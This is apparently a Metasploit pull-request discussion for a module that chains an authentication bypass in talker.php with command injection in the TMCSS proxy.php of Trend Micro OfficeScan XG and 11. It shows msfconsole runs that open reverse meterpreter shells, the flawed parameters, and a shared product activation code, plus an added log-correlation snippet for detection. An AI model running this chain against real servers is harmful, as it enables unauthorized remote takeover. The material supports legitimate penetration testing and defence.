
Adding Trend Micro OfficeScan Widget RCE module #9052

Merged: 2 commits merged into rapid7:master on Oct 10, 2017

Conversation

@mmetince (Contributor) commented Oct 8, 2017

This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

Verification

  • Start msfconsole
  • use exploit/windows/http/trendmicro_officescan_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing "The target appears to be vulnerable."
  • Run exploit
  • Verify that you are seeing the PHPSESSID value.
  • Verify that you are getting a meterpreter session.

Scenarios

msf > use exploit/windows/http/trendmicro_officescan_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.184
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Exploiting authentication bypass
[+] Awesome. PHPSESSID=qkbkkkb281fn4019e02g80i156;
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.184
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.184:50582) at 2017-10-08 10:13:27 +0300

meterpreter > sysinfo
Computer        : CME
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
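A defender-side correlation over web-server access logs, added here as an example and not part of the module or this pull request: it reports every request to a proxy.php under the TMCSS folder and marks those that follow a talker.php request from the same client within a short window, the two files the review below names as the authentication-bypass and command-injection points. The log lines and URL prefixes are constructed assumptions; only the two file names come from the thread.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache-style access-log lines (an assumption, not data from the PR).
# Only the file names talker.php and TMCSS/proxy.php come from the thread; the
# URL prefixes are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Oct/2017:10:13:20 +0300] "POST /widget/inc/talker.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Oct/2017:10:13:22 +0300] "POST /widget/proxy/mod/TMCSS/proxy.php HTTP/1.1" 200 87',
    '10.0.0.9 - - [09/Oct/2017:10:20:01 +0300] "POST /widget/proxy/mod/TMCSS/proxy.php HTTP/1.1" 200 87',
    '10.0.0.5 - - [09/Oct/2017:10:59:00 +0300] "POST /widget/inc/talker.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Oct/2017:11:05:00 +0300] "POST /widget/proxy/mod/TMCSS/proxy.php HTTP/1.1" 200 87',
    '10.0.0.7 - - [09/Oct/2017:11:10:00 +0300] "GET /widget/index.php HTTP/1.1" 200 4096',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TALKER_RE = re.compile(r'/talker\.php(?:\?|$)', re.IGNORECASE)
PROXY_RE = re.compile(r'/TMCSS/proxy\.php(?:\?|$)', re.IGNORECASE)

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for a line that does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    return m.group('ip'), ts, m.group('path'), int(m.group('status'))

def find_widget_chains(lines, window=timedelta(seconds=60)):
    """Report each TMCSS proxy.php request; mark it as a possible bypass+injection chain
    when the same client hit talker.php within `window`. Both kinds are triage leads only:
    a logged-in console user can produce the same sequence, so confirm against the session."""
    last_talker = {}      # client ip -> time of its most recent talker.php request
    findings = []
    for rec in map(parse_line, lines):
        if rec is None:
            continue
        ip, ts, path, _status = rec
        if TALKER_RE.search(path):
            last_talker[ip] = ts
        elif PROXY_RE.search(path):
            prev = last_talker.get(ip)
            if prev is not None and timedelta(0) <= ts - prev <= window:
                findings.append((ip, ts.isoformat(), 'chain: talker.php then TMCSS proxy.php'))
            else:
                findings.append((ip, ts.isoformat(), 'TMCSS proxy.php without recent talker.php'))
    return findings
```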

@stevenseeley (Contributor) commented Oct 8, 2017

Nice work! But I also bypassed the auth too! It’s just that ZDI ‘couldn’t repro’.

@ThePirateWhoSmellsOfSunflowers commented Oct 9, 2017

Hi!
Does the error {"response":"ERR","errcode":108,"timestamp":1507535648,"message":"Invalid http header token"} mean the server is patched? Thanks.

🌻

@mmetince (Contributor, Author) commented Oct 9, 2017

That makes sense though. I've done my homework before releasing the article tbh :-) I've diffed the source code between the latest version and the vulnerable version. I realised that the command injection is fixed but the authentication bypass still exists. Since none of the ZDI advisories mentioned it, I've claimed that I've found it.

I thank you for your awesome work @stevenseeley 🤘.

Review comment on the documentation file, at the lines:

## Scenarios

msf > use exploit/windows/http/trendmicro_officescan_exec

@mmetince (Author, Contributor) commented Oct 9, 2017

Going to change it to trendmicro_officescan_widget_exec. I'm just waiting for a full review so I can fix them with a single commit.

@stevenseeley (Contributor) commented Oct 9, 2017

Yeah I didn't report it because I wouldn't get paid. It's how it goes sometimes.

@stevenseeley (Contributor) commented Oct 9, 2017

But you also found it, so congrats!

Review comment on the module description, at the lines:

This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

Trend Micro Officescan product have widget feature which is implemented with PHP. Talker.php takes ack and hash parameter but don't validate these values, which leads to an authentication bypass for widget. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

@h00die (Contributor) commented Oct 9, 2017

The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

Review comment on the documentation file, at the lines:

If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.

ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe

@h00die (Contributor) commented Oct 9, 2017

or http://files.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe
Review comment on the module description, at the lines:

This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro Officescan product

@h00die (Contributor) commented Oct 9, 2017

update per the comments in the .md file

@h00die (Contributor) commented Oct 9, 2017

looks like you need a valid activation code for this product to install it.

@mmetince (Contributor, Author) commented Oct 9, 2017

@h00die You can get it through free trial submission. Or just use this OS-8Y6M-XYUDV-6S4ZK-Q2Z77-LH2UR-RCC7G .

@h00die (Contributor) commented Oct 9, 2017

trying imsva then i'll circle back

@mmetince (Contributor, Author) commented Oct 9, 2017

Please stop the review until the new commit. I've got a lead on @ThePirateWhoSmellsOfSunflowers's question. There are two major versions of OfficeScan (11 and XG). This module has been implemented only for XG, which is the newer version. There is a slight difference between these versions. I'm about to finish the work. We will have a single module that exploits both of them.

@mmetince (Contributor, Author) commented Oct 9, 2017

Okay, I've made a lot of changes. I've tried my best to make it clear in the comments in the source code @h00die.

You may need to test the module against OfficeScan 11 as well. Here is the download link: ftp://download.trendmicro.com/products/officescan/OSCE11_1028_GM.exe You can use exactly the same activation code.

Here is the output of the module. I've done my test against both versions.

Results for OfficeScan XG

msf > use exploit/windows/http/trendmicro_officescan_widget_exec 
msf exploit(trendmicro_officescan_widget_exec) > set RHOST 12.0.0.190
RHOST => 12.0.0.190
msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[+] 12.0.0.190:443 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.190
[*] Meterpreter session 12 opened (12.0.0.1:4444 -> 12.0.0.190:49179) at 2017-10-09 22:16:05 +0300

meterpreter > sysinfo
Computer        : CAN-KOBAY
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

Results for OfficeScan 11

msf exploit(trendmicro_officescan_widget_exec) > set RHOST 12.0.0.176
RHOST => 12.0.0.176
msf exploit(trendmicro_officescan_widget_exec) > set RPORT 4343
RPORT => 4343
msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan 11
[+] 12.0.0.176:4343 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan 11
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.176
[*] Meterpreter session 13 opened (12.0.0.1:4444 -> 12.0.0.176:49184) at 2017-10-09 22:17:11 +0300


meterpreter > 
meterpreter > sysinfo 
Computer        : CAN-KOBAY
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > 

@h00die (Contributor) commented Oct 9, 2017

i'll get to this today. Want to add ftp://download.trendmicro.com/products/officescan/OSCE11_1028_GM.exe to the downloads list?

@mmetince (Contributor, Author) commented Oct 9, 2017

I think it's unnecessary, they are showing only XG version on their download webpage. I've just found the older version on their ftp server.

@h00die h00die removed the delayed label Oct 9, 2017

@h00die h00die self-assigned this Oct 9, 2017

@h00die (Contributor) commented Oct 10, 2017

XG working.

msf exploit(trendmicro_officescan) > use exploit/windows/http/trendmicro_officescan_widget_exec 
msf exploit(trendmicro_officescan_widget_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(trendmicro_officescan_widget_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(trendmicro_officescan_widget_exec) > set rport 4343
rport => 4343
msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[+] 1.1.1.1:4343 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 192.168.2.209
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 192.168.2.209:57314) at 2017-10-09 20:09:24 -0400

meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

@h00die (Contributor) commented Oct 10, 2017

11 also working.

msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan 11
[+] 1.1.1.1:4343 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > set target 1
target => 1
msf exploit(trendmicro_officescan_widget_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4545 
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (2.2.2.2:4545 -> 1.1.1.1:49244) at 2017-10-09 20:39:55 -0400

meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

@h00die h00die merged commit c14c93d into rapid7:master Oct 10, 2017

h00die added a commit that referenced this pull request Oct 10, 2017
@h00die (Contributor) commented Oct 10, 2017

Had one minor edit (file rename and added a L3 heading): b796c0b#diff-827d139b3afe7983b0907975f6241456

@h00die (Contributor) commented Oct 10, 2017

Release Notes

This PR adds an unauthenticated RCE for Trend Micro OfficeScan XG and 11 combining two different vulnerabilities (auth bypass, RCE) to achieve the shell.

@h00die (Contributor) commented Oct 10, 2017

excellent work @mmetince thanks for getting it all tackled in short time!
